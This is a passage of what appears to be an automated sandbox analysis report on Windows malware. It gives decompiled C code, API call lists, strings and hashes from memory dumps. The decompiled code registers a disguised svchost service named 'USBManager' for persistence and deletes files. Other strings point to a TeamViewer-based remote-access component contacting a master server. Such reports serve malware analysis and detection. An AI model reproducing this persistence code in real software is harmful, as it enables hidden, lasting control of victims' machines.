								_t201 =  &(_t200[6]);
								_t111 = RegCreateKeyExA(0x80000002,  &_v1032, 0, 0, 0, 0xf023f, 0,  &_v1112, 0); // executed
								if(_t111 == 0) {
									E6F332170(_v1112, 4);
									_t201 =  &(_t201[2]);
									_v1100 = 0x2000;
									RegSetValueExA(_v1112, "AuthenticationCapabilities", 0, 4,  &_v1100, 4); // executed
									_v1104 = 1;
									RegSetValueExA(_v1112, "CoInitializeSecurityParam", 0, 4,  &_v1104, 4); // executed
									RegCloseKey(_v1112);
								}
								wsprintfA( &_v1032, "SYSTEM\\CurrentControlSet%s%s%s", "\\Services\\", "USBManager", "\\Parameters");
								_t202 =  &(_t201[5]);
								_t114 = RegCreateKeyExA(0x80000002,  &_v1024, 0, 0, 0, 0xf023f, 0,  &_v1104, 0); // executed
								if(_t114 == 0) {
									E6F332170(_v1104, 4);
									_t182 = M6F34052C; // 0x33
									_t125 = M6F340524; // 0xa56118
									_t202 =  &(_t202[2]);
									RegSetValueExA(_v1104, "ServiceDLL", 0, 2, _t125, _t182 + 1); // executed
									RegSetValueExA(_v1104, "ImagePath", 0, 2,  &_v760, _v1100 + 1); // executed
									RegSetValueExA(_v1104, "ServiceMain", 0, 1, "SvcEntry", lstrlenA("SvcEntry")); // executed
									_v1096 = 0;
									RegSetValueExA(_v1104, "ServiceDllUnloadOnStop", 0, 4,  &_v1096, 4); // executed
									RegCloseKey(_v1104);
								}
								wsprintfA( &_v1024, "SYSTEM\\CurrentControlSet%s%s%s", "\\Services\\", "USBManager", 0x6f33d543);
								_t203 =  &(_t202[5]);
								_t117 = RegCreateKeyExA(0x80000002,  &_v1016, 0, 0, 0, 0xf023f, 0,  &_v1096, 0); // executed
								if(_t117 == 0) {
									E6F332170(_v1096, 4);
									_t203 =  &(_t203[2]);
									RegSetValueExA(_v1096, "ServiceMain", 0, 1, "SvcEntry", lstrlenA("SvcEntry")); // executed
									RegCloseKey(_v1096);
								}
								E6F332170(_t145, 2);
								_t196 =  &(_t203[2]);
								goto L14;
							}
						}
					}
					CloseServiceHandle(_v1128);
					return _v1132;
				} else {
					_t80 = OpenSCManagerA(0, 0, 1);
					_v1108 = _t80;
					if(_t80 == 0) {
						return 0;
					} else {
						goto L2;
					}
				}
			}





























































                                                                                                                        0x6f333c60
                                                                                                                        0x6f333c7a
                                                                                                                        0x6f333c7e
                                                                                                                        0x6f333c80
                                                                                                                        0x6f333c86
                                                                                                                        0x6f333c9a
                                                                                                                        0x6f333ca6
                                                                                                                        0x6f333cbc
                                                                                                                        0x6f333cc0
                                                                                                                        0x6f333fdb
                                                                                                                        0x6f333ff4
                                                                                                                        0x6f333ffc
                                                                                                                        0x6f33401a
                                                                                                                        0x6f334022
                                                                                                                        0x6f334028
                                                                                                                        0x6f334031
                                                                                                                        0x6f334032
                                                                                                                        0x6f334051
                                                                                                                        0x6f334059
                                                                                                                        0x6f334061
                                                                                                                        0x6f334069
                                                                                                                        0x6f334081
                                                                                                                        0x6f334081
                                                                                                                        0x6f334087
                                                                                                                        0x6f33409d
                                                                                                                        0x6f33406b
                                                                                                                        0x6f33406b
                                                                                                                        0x6f33407f
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f33407f
                                                                                                                        0x6f3340a4
                                                                                                                        0x6f3340a4
                                                                                                                        0x6f3340b1
                                                                                                                        0x6f3340b6
                                                                                                                        0x6f3340c4
                                                                                                                        0x6f3340c8
                                                                                                                        0x6f3340d0
                                                                                                                        0x6f3340d9
                                                                                                                        0x6f3340df
                                                                                                                        0x6f3340f2
                                                                                                                        0x6f3340f3
                                                                                                                        0x6f3340e1
                                                                                                                        0x6f3340e1
                                                                                                                        0x6f3340e7
                                                                                                                        0x6f3340ef
                                                                                                                        0x6f3340ef
                                                                                                                        0x6f3340f4
                                                                                                                        0x6f3340f5
                                                                                                                        0x6f3340fa
                                                                                                                        0x6f3340fe
                                                                                                                        0x6f333cc6
                                                                                                                        0x6f333cc6
                                                                                                                        0x6f333ccc
                                                                                                                        0x6f333cd2
                                                                                                                        0x6f333cef
                                                                                                                        0x6f333cf1
                                                                                                                        0x6f333d10
                                                                                                                        0x6f333d24
                                                                                                                        0x6f333d28
                                                                                                                        0x6f333d3d
                                                                                                                        0x6f333d41
                                                                                                                        0x6f333d45
                                                                                                                        0x6f333d50
                                                                                                                        0x6f333d54
                                                                                                                        0x6f333d58
                                                                                                                        0x6f333d5c
                                                                                                                        0x6f333d60
                                                                                                                        0x6f333d64
                                                                                                                        0x6f333d68
                                                                                                                        0x6f333d70
                                                                                                                        0x6f333d74
                                                                                                                        0x6f333d7a
                                                                                                                        0x6f333d95
                                                                                                                        0x6f333d97
                                                                                                                        0x6f333db3
                                                                                                                        0x6f333dbb
                                                                                                                        0x6f333ddb
                                                                                                                        0x6f333de2
                                                                                                                        0x6f333de2
                                                                                                                        0x6f333de8
                                                                                                                        0x6f333e04
                                                                                                                        0x6f333e06
                                                                                                                        0x6f333e22
                                                                                                                        0x6f333e2a
                                                                                                                        0x6f333e33
                                                                                                                        0x6f333e3c
                                                                                                                        0x6f333e4f
                                                                                                                        0x6f333e57
                                                                                                                        0x6f333e6d
                                                                                                                        0x6f333e75
                                                                                                                        0x6f333e7c
                                                                                                                        0x6f333e7c
                                                                                                                        0x6f333e9b
                                                                                                                        0x6f333e9d
                                                                                                                        0x6f333eb9
                                                                                                                        0x6f333ec1
                                                                                                                        0x6f333ece
                                                                                                                        0x6f333ed3
                                                                                                                        0x6f333ed9
                                                                                                                        0x6f333ee2
                                                                                                                        0x6f333ef1
                                                                                                                        0x6f333f0e
                                                                                                                        0x6f333f2e
                                                                                                                        0x6f333f44
                                                                                                                        0x6f333f48
                                                                                                                        0x6f333f4f
                                                                                                                        0x6f333f4f
                                                                                                                        0x6f333f6e
                                                                                                                        0x6f333f70
                                                                                                                        0x6f333f8c
                                                                                                                        0x6f333f94
                                                                                                                        0x6f333f9d
                                                                                                                        0x6f333fa2
                                                                                                                        0x6f333fc3
                                                                                                                        0x6f333fca
                                                                                                                        0x6f333fca
                                                                                                                        0x6f333fd3
                                                                                                                        0x6f333fd8
                                                                                                                        0x00000000
                                                                                                                        0x6f333fd8
                                                                                                                        0x6f333d28
                                                                                                                        0x6f333ccc
                                                                                                                        0x6f334109
                                                                                                                        0x6f33411d
                                                                                                                        0x6f333c88
                                                                                                                        0x6f333c8c
                                                                                                                        0x6f333c8e
                                                                                                                        0x6f333c94
                                                                                                                        0x6f334129
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f333c94

                                                                                                                        APIs
                                                                                                                        • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 6F333C7E
                                                                                                                        • OpenSCManagerA.ADVAPI32(00000000,00000000,00000001), ref: 6F333C8C
                                                                                                                        • OpenServiceA.ADVAPI32(00000000,USBManager,000F01FF), ref: 6F333CAA
                                                                                                                        • wsprintfA.USER32 ref: 6F333CEF
                                                                                                                        • CreateServiceA.ADVAPI32(?,USBManager,USB Ports Manager,000F01FF,00000020,00000002,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 6F333D1E
                                                                                                                        • ChangeServiceConfig2A.ADVAPI32 ref: 6F333D74
                                                                                                                        • wsprintfA.USER32 ref: 6F333D95
                                                                                                                        • RegCreateKeyExA.KERNEL32(80000002,?,00000000,00000000,00000000,000F023F,00000000,?,00000000,?,?,?,00000000,00000002,?), ref: 6F333DB3
                                                                                                                        • lstrlenA.KERNEL32(USBManager,?,?,?,00000000,00000002,?), ref: 6F333DC2
                                                                                                                        • RegSetValueExA.KERNEL32(?,USBPortsManagerGrp,00000000,00000007,USBManager,00000000,?,?,?,00000000,00000002,?), ref: 6F333DDB
                                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,00000000,00000002,?), ref: 6F333DE2
                                                                                                                        • wsprintfA.USER32 ref: 6F333E04
                                                                                                                        • RegCreateKeyExA.KERNEL32(80000002,?,00000000,00000000,00000000,000F023F,00000000,?,00000000), ref: 6F333E22
                                                                                                                        • RegSetValueExA.KERNEL32 ref: 6F333E57
                                                                                                                        • RegSetValueExA.KERNEL32(00000000,CoInitializeSecurityParam,00000000,00000004,?,00000004), ref: 6F333E75
                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 6F333E7C
                                                                                                                        • wsprintfA.USER32 ref: 6F333E9B
                                                                                                                        • RegCreateKeyExA.KERNEL32(80000002,?,00000000,00000000,00000000,000F023F,00000000,?,00000000), ref: 6F333EB9
                                                                                                                        • RegSetValueExA.KERNEL32(?,ServiceDLL,00000000,00000002,00A56118,00000034), ref: 6F333EF1
                                                                                                                        • RegSetValueExA.KERNEL32(?,ImagePath,00000000,00000002,?,?), ref: 6F333F0E
                                                                                                                        • lstrlenA.KERNEL32(SvcEntry), ref: 6F333F15
                                                                                                                        • RegSetValueExA.KERNEL32(?,ServiceMain,00000000,00000001,SvcEntry,00000000), ref: 6F333F2E
                                                                                                                        • RegSetValueExA.KERNEL32(?,ServiceDllUnloadOnStop,00000000,00000004,?,00000004), ref: 6F333F48
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 6F333F4F
                                                                                                                        • wsprintfA.USER32 ref: 6F333F6E
                                                                                                                        • RegCreateKeyExA.KERNEL32(80000002,?,00000000,00000000,00000000,000F023F,00000000,?,00000000), ref: 6F333F8C
                                                                                                                        • lstrlenA.KERNEL32(SvcEntry), ref: 6F333FAA
                                                                                                                        • RegSetValueExA.KERNEL32(?,ServiceMain,00000000,00000001,SvcEntry,00000000), ref: 6F333FC3
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 6F333FCA
                                                                                                                        • wsprintfA.USER32 ref: 6F333FFC
                                                                                                                        • RegCreateKeyExA.KERNEL32(80000002,?,00000000,00000000,00000000,000F023F,00000000,?,00000000,\Parameters), ref: 6F33401A
                                                                                                                        • RtlZeroMemory.NTDLL(?,00000105), ref: 6F334032
                                                                                                                        • RegQueryValueExA.KERNEL32 ref: 6F334061
                                                                                                                        • lstrcmpiA.KERNEL32(?,00A56118), ref: 6F334077
                                                                                                                        • RegSetValueExA.ADVAPI32(?,ServiceDLL,00000000,00000002,00A56118,00000034), ref: 6F33409D
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 6F3340A4
                                                                                                                        • RtlZeroMemory.NTDLL(?,00000024), ref: 6F3340B1
                                                                                                                        • QueryServiceStatusEx.ADVAPI32(00000000,00000000,?,00000024,?,?,00000024), ref: 6F3340C8
                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000), ref: 6F3340FE
                                                                                                                        • CloseServiceHandle.ADVAPI32(?), ref: 6F334109
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Value$Close$CreateServicewsprintf$Openlstrlen$HandleManagerMemoryQueryZero$ChangeConfig2Statuslstrcmpi
                                                                                                                        • String ID: %%SYSTEMROOT%%\system32\%s.exe -k "%s" -svcr "%s"$%s\%s%c%s$AuthenticationCapabilities$CoInitializeSecurityParam$ImagePath$SYSTEM\CurrentControlSet%s%s%s$ServiceDLL$ServiceDllUnloadOnStop$ServiceMain$SvcEntry$USB Ports Manager$USBManager$USBPortsManagerGrp$\Parameters$\Services\$svchost
                                                                                                                        • API String ID: 567274075-2313540708
                                                                                                                        • Opcode ID: 6c46b81ff668685163f17a5dd8cb97c76a573c8b989e1ee7d0da47bd9e696097
                                                                                                                        • Instruction ID: e75517b751e58ab8b4c927880bb4f16b22d5a4c9f60e3aac4c359e693cc06952
                                                                                                                        • Opcode Fuzzy Hash: 6c46b81ff668685163f17a5dd8cb97c76a573c8b989e1ee7d0da47bd9e696097
                                                                                                                        • Instruction Fuzzy Hash: 8FD17CB2A04798BFD310DF61CC85E6BB7EDFB99B08F40490DF69992140D772E4188B66
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004DC9D6, Relevance: 53.9, APIs: 15, Strings: 15, Instructions: 1354sleepwindowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004DC9F8
                                                                                                                          • Part of subcall function 004A1B0C: __EH_prolog3.LIBCMT ref: 004A1B13
                                                                                                                          • Part of subcall function 004A1B0C: InitializeCriticalSection.KERNEL32(?,00000004,004B59A0,00747890,00000000), ref: 004A1B28
                                                                                                                          • Part of subcall function 004A17BA: __EH_prolog3.LIBCMT ref: 004A17C1
                                                                                                                          • Part of subcall function 004A17BA: DeleteCriticalSection.KERNEL32(?,00000004,004BE908,000001F8,?,?,?,0044D2A4,00000002), ref: 004A17DC
                                                                                                                          • Part of subcall function 004CD12C: __EH_prolog3.LIBCMT ref: 004CD133
                                                                                                                          • Part of subcall function 004CD12C: GetTickCount.KERNEL32 ref: 004CD14A
                                                                                                                          • Part of subcall function 0050E764: __EH_prolog3.LIBCMT ref: 0050E76B
                                                                                                                          • Part of subcall function 004EA0E3: __EH_prolog3.LIBCMT ref: 004EA0EA
                                                                                                                          • Part of subcall function 004EA0E3: GetCurrentThread.KERNEL32 ref: 004EA12F
                                                                                                                          • Part of subcall function 004EA0E3: SetThreadPriority.KERNEL32(00000000), ref: 004EA136
                                                                                                                          • Part of subcall function 004E9D17: __EH_prolog3.LIBCMT ref: 004E9D1E
                                                                                                                          • Part of subcall function 004B982C: __EH_prolog3.LIBCMT ref: 004B9833
                                                                                                                          • Part of subcall function 004B5743: __EH_prolog3.LIBCMT ref: 004B574A
                                                                                                                          • Part of subcall function 004B5743: LoadStringW.USER32(10000000,?,00000000,00000100), ref: 004B5794
                                                                                                                          • Part of subcall function 004B5743: LoadStringW.USER32(?,?,00000000,00000100), ref: 004B57CB
                                                                                                                          • Part of subcall function 004BEE12: __EH_prolog3.LIBCMT ref: 004BEE19
                                                                                                                          • Part of subcall function 004A1784: __EH_prolog3.LIBCMT ref: 004A178B
                                                                                                                          • Part of subcall function 004A1784: InitializeCriticalSection.KERNEL32(?,00000004,004BE363,000001F8,?,?,?,0044D2A4,00000002), ref: 004A17A0
                                                                                                                          • Part of subcall function 004A1BF0: __EH_prolog3.LIBCMT ref: 004A1BF7
                                                                                                                          • Part of subcall function 004A1BF0: EnterCriticalSection.KERNEL32(?,00000004,004BE3C7,00000000,0077C1F8,00000000,000001F8,?,?,?,0044D2A4,00000002), ref: 004A1C05
                                                                                                                          • Part of subcall function 004A1BF0: LeaveCriticalSection.KERNEL32(?,?,?,?,0044D2A4,00000002), ref: 004A1C45
                                                                                                                        • GetTickCount.KERNEL32 ref: 004DD2FD
                                                                                                                        • Sleep.KERNEL32(00000064), ref: 004DD31E
                                                                                                                          • Part of subcall function 004C0863: __EH_prolog3.LIBCMT ref: 004C086A
                                                                                                                          • Part of subcall function 004C8458: __EH_prolog3.LIBCMT ref: 004C845F
                                                                                                                          • Part of subcall function 004B7793: __EH_prolog3_catch.LIBCMT ref: 004B779D
                                                                                                                        • GetTickCount.KERNEL32 ref: 004DD324
                                                                                                                        • PostMessageW.USER32(00000407,00000001,00000001,0085300C), ref: 004DD798
                                                                                                                        • Sleep.KERNEL32(000000C8), ref: 004DDA99
                                                                                                                        • __time32.LIBCMT ref: 004DDAD4
                                                                                                                        • _rand.LIBCMT ref: 004DDAFF
                                                                                                                        • _rand.LIBCMT ref: 004DDB2B
                                                                                                                        • Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,0085300C,0077C1F8), ref: 004DDB70
                                                                                                                        • PostMessageW.USER32(00000407,00000001,00000002), ref: 004DDB9D
                                                                                                                        • PostMessageW.USER32(00000407,00000001,00000003), ref: 004DDBD5
                                                                                                                          • Part of subcall function 004DC716: __EH_prolog3.LIBCMT ref: 004DC71D
                                                                                                                        • Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,0085300C,0077C1F8), ref: 004DDC53
                                                                                                                        Strings
                                                                                                                        • BROWSER, xrefs: 004DCB58
                                                                                                                        • MANUAL, xrefs: 004DCB98
                                                                                                                        • GWW.CustomRouterUnavailable, xrefs: 004DD3D5
                                                                                                                        • GWW.KeepAliveLost, xrefs: 004DD500
                                                                                                                        • TeamViewer, xrefs: 004DD396
                                                                                                                        • Proxy: Trying to connect. Mode=, xrefs: 004DCC60
                                                                                                                        • ProxySearch: Failed. No working setting found., xrefs: 004DCF43
                                                                                                                        • ProxySearch: Trying to connect with found setting: DIRECT (NONE), xrefs: 004DCE60
                                                                                                                        • ProxySearch: Trying to connect with found setting: , xrefs: 004DCDFD
                                                                                                                        • ProxySearch: Trying to connect with found setting: IE, xrefs: 004DCDD9
                                                                                                                        • WaitAtGateway::Run(): Could not connect to Master-Server MasterIp=, xrefs: 004DD913
                                                                                                                        • WaitAtGateway::Run() Connect to Master successful, xrefs: 004DD8EC
                                                                                                                        • , Proxy-IP=, xrefs: 004DCC4B
                                                                                                                        • WaitAtGateway, xrefs: 004DCA06, 004DD053, 004DD87A
                                                                                                                        • DIRECT (NONE), xrefs: 004DCB18
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3$CriticalSection$Sleep$CountMessagePostTick$InitializeLoadStringThread_rand$CurrentDeleteEnterH_prolog3_catchLeavePriority__time32
                                                                                                                        • String ID: , Proxy-IP=$BROWSER$DIRECT (NONE)$GWW.CustomRouterUnavailable$GWW.KeepAliveLost$MANUAL$Proxy: Trying to connect. Mode=$ProxySearch: Failed. No working setting found.$ProxySearch: Trying to connect with found setting: $ProxySearch: Trying to connect with found setting: DIRECT (NONE)$ProxySearch: Trying to connect with found setting: IE$TeamViewer$WaitAtGateway$WaitAtGateway::Run() Connect to Master successful$WaitAtGateway::Run(): Could not connect to Master-Server MasterIp=
                                                                                                                        • API String ID: 1809673057-3897402427
                                                                                                                        • Opcode ID: 1f3b7961b58a2b7d95da6dbbf2a673e1e8024ead0c5184593f76227b4b01f95a
                                                                                                                        • Instruction ID: d9812ff84bd4b09a939aa376837265a540f3df5c3d9b162d162bc6b2bbe51010
                                                                                                                        • Opcode Fuzzy Hash: 1f3b7961b58a2b7d95da6dbbf2a673e1e8024ead0c5184593f76227b4b01f95a
                                                                                                                        • Instruction Fuzzy Hash: 5AC21770D05288AADF11EBA4C965BEEBBB5AF51304F14409FE04167392DB7C1F48C76A
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F3328B0, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 84filestringCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 81%
                                                                                                                        			E6F3328B0(intOrPtr _a8) {
				intOrPtr _v4;
				char _v520;
				char _v528;
				struct _WIN32_FIND_DATAA _v840;
				void* _t25;
				intOrPtr _t36;
				char _t43;
				void* _t48;
				CHAR* _t49;
				struct _WIN32_FIND_DATAA* _t53;
				DWORD* _t54;

				_t53 =  &_v840;
				_push(0x140);
				_push( &_v840);
				L6F33C2EE();
				_push(0x208);
				_push( &_v528);
				L6F33C2EE();
				_t43 = "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0xa56008
				_t49 = _t53 + wsprintfA( &(_v840.cAlternateFileName), "%s", _t43) + 0x160;
				wsprintfA(_t49, "%s%c%s", 0x6f33d543, 0x2a, _v4);
				_t54 =  &(_t53->nFileSizeLow);
				_t25 = FindFirstFileA( &_v520,  &_v840); // executed
				_t48 = _t25;
				 *_t49 = 0;
				if(_t48 == 0xffffffff) {
					return _t25;
				} else {
					_t36 = _a8;
					do {
						if(lstrcmpA( &(_v840.cFileName), ".") != 0 && lstrcmpA( &(_v840.cFileName), "..") != 0) {
							lstrcatA( &_v520,  &(_v840.cFileName));
							if((_v840.dwFileAttributes & 0x00000010) == 0) {
								if(_t36 == 0) {
									E6F332750( &_v520);
									_t54 =  &(_t54[1]);
								} else {
									DeleteFileA( &_v520);
								}
							}
						}
						 *_t49 = 0;
					} while (FindNextFileA(_t48,  &_v840) != 0);
					return FindClose(_t48);
				}
			}














                                                                                                                        0x6f3328b0
                                                                                                                        0x6f3328b8
                                                                                                                        0x6f3328c1
                                                                                                                        0x6f3328c2
                                                                                                                        0x6f3328c7
                                                                                                                        0x6f3328d3
                                                                                                                        0x6f3328d4
                                                                                                                        0x6f3328d9
                                                                                                                        0x6f332904
                                                                                                                        0x6f332911
                                                                                                                        0x6f332913
                                                                                                                        0x6f332923
                                                                                                                        0x6f332929
                                                                                                                        0x6f33292b
                                                                                                                        0x6f332931
                                                                                                                        0x6f3329c8
                                                                                                                        0x6f332937
                                                                                                                        0x6f332938
                                                                                                                        0x6f332946
                                                                                                                        0x6f332954
                                                                                                                        0x6f332973
                                                                                                                        0x6f33297e
                                                                                                                        0x6f332982
                                                                                                                        0x6f33299c
                                                                                                                        0x6f3329a1
                                                                                                                        0x6f332984
                                                                                                                        0x6f33298c
                                                                                                                        0x6f33298c
                                                                                                                        0x6f332982
                                                                                                                        0x6f33297e
                                                                                                                        0x6f3329aa
                                                                                                                        0x6f3329b3
                                                                                                                        0x00000000
                                                                                                                        0x6f3329bf

                                                                                                                        APIs
                                                                                                                        • RtlZeroMemory.NTDLL(00000140,00000140), ref: 6F3328C2
                                                                                                                        • RtlZeroMemory.NTDLL(?,00000208), ref: 6F3328D4
                                                                                                                        • wsprintfA.USER32 ref: 6F3328F3
                                                                                                                        • wsprintfA.USER32 ref: 6F332911
                                                                                                                        • FindFirstFileA.KERNEL32(?,?), ref: 6F332923
                                                                                                                        • lstrcmpA.KERNEL32(?,6F33D538,00000000,?), ref: 6F332950
                                                                                                                        • lstrcmpA.KERNEL32(?,6F33D534), ref: 6F332960
                                                                                                                        • lstrcatA.KERNEL32(?,?), ref: 6F332973
                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 6F33298C
                                                                                                                        • FindNextFileA.KERNEL32(00000000,?), ref: 6F3329AD
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 6F3329B8
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: FileFind$MemoryZerolstrcmpwsprintf$CloseDeleteFirstNextlstrcat
                                                                                                                        • String ID: %s%c%s
                                                                                                                        • API String ID: 1322953341-2756932909
                                                                                                                        • Opcode ID: a77709927d85bdddff63a9056d814544ab56a81affef240bec6227ea869c1012
                                                                                                                        • Instruction ID: d6b98663d72a1ff9cbf405f5d9242ef888dd8abf659fcc356b496d4c2fbdd1d7
                                                                                                                        • Opcode Fuzzy Hash: a77709927d85bdddff63a9056d814544ab56a81affef240bec6227ea869c1012
                                                                                                                        • Instruction Fuzzy Hash: 8D2191739043D9EBD724DBA4CC44EEBB7EDAF8A314F04491DF69482180EB71E1188762
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004BF3A9, Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 314fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004BF3CB
                                                                                                                        • GetVolumeInformationW.KERNEL32(C:\,00000000,00000000,?,00000000,00000000,00000000,00000000,000000F4), ref: 004BF436
                                                                                                                        • FindFirstFileW.KERNEL32(?,00000000,0077C1F8,00000000), ref: 004BF47A
                                                                                                                        • FindClose.KERNEL32(?), ref: 004BF4A5
                                                                                                                        • GetVolumeInformationW.KERNEL32(C:\,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,000000F4), ref: 004BF6A3
                                                                                                                          • Part of subcall function 004A17E8: __EH_prolog3.LIBCMT ref: 004A17EF
                                                                                                                          • Part of subcall function 004A17E8: InitializeCriticalSection.KERNEL32(?,00000004,0044D1D9,00000000), ref: 004A1804
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: FindH_prolog3InformationVolume$CloseCriticalFileFirstInitializeSection
                                                                                                                        • String ID: %x%x$C:\$_%x%x
                                                                                                                        • API String ID: 596022118-2960449516
                                                                                                                        • Opcode ID: af15d0e1a138e9fb1e2b282ef002459527b2498bbac3ecb482b5d3beb8cb70f6
